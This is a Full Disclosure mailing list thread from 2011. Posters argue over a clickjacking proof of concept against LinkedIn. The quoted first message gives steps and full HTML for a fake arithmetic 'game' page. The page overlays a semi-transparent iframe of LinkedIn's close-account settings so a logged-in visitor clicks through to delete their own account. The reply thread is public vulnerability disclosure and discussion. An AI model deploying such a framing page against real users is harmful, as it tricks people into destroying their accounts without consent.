Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: LinkedIn_User Account Delete using Click jacking

From: xD 0x41 <secn3t () gmail com>
Date: Mon, 10 Oct 2011 09:36:17 +1100
 seems that you aren't familiar what Clickjacking means then...

No,... and am happy not to know :-) , like XSS , i do not waste time with
ninoritiy bugs such as 'clickjacking' and these new such terms wich are
total BS.
anyhow... call it what you like, it is bs (just like the win32 dll crap and
simple-xss) CRAP!)
xd



On 10 October 2011 04:53, Ferenc Kovacs <tyra3l () gmail com> wrote:


it seems that you aren't familiar what Clickjacking means then...

On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 <secn3t () gmail com> wrote:

Thats just lame dude.... if you could remove OTHER poples accounts, then

id

say 8clap clap*... but own account... whjat about just clicking "close
account" , and lets skip creating a html page, for this... :) cheers


On 8 October 2011 17:06, asish agarwalla <asishagarwalla () gmail com>

wrote:


Be logged into Linkedin, in firefox
Create a HTML page using the below code
Open the created HTML page in a new firefox tab
Play the simple game

<html>
<head>
<style>
button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
#Div3{
opacity: 0;
position: absolute;
top: 25px;
left: 160px;
}
#Div2{
opacity: 1;
position: absolute;
top: 65px;
left: 340px;
}
#Div1 {
opacity: 1;
position: absolute;
top: 65px;
left: 195px;
}
#victim2 {
opacity: 1;
position: absolute;
top: 65px;
left: 50px;
}
#victim {
opacity: 0.4;
position: absolute;
top: -226px;
left: -35px;
width:800px;
height: 800px;
}
</style>
</head>
<body>
<div>
<h1>Please Click Twice on the Right Options And Then Click Submit</h1>
</div>
<div id=Div3>
<h1>55+27=?</h1>
</div>
<div id=victim2>
<h1>55 </h1>
</div>
<div id=Div1>
<h1>82</h1>
</div>
<div id=Div2>
<h1>95</h1>
</div>
<button type="button" class="dummy3">Submit</button>
<div id=victim>
<iframe
src="

https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1
"

border=0 scrolling=no width=650 height=1100></iframe>
</div>
</body>
</html>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
Ferenc Kovács
@Tyr43l - http://tyrael.hu


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: